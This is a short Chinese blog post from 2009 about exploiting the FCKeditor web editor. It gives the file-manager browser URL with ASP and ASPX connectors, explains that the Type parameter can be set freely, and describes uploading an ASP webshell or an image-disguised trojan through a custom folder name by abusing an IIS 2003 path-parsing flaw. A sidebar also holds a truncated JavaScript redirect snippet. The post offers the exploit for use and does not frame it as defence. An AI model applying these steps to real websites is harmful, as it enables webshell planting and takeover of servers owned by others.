暴 fckeditor漏洞利用

2009年8月12日星期三 | | |

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马,利用2003路径解析漏洞,也可以直接上传ASP木马。

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如:

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

欢迎访问我的空间: http://ytfso.yi.org

我的QQ空间
带倒记时的js跳转代码
function times() {for (i=4;i>0;i++) {setTimeout('reli...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]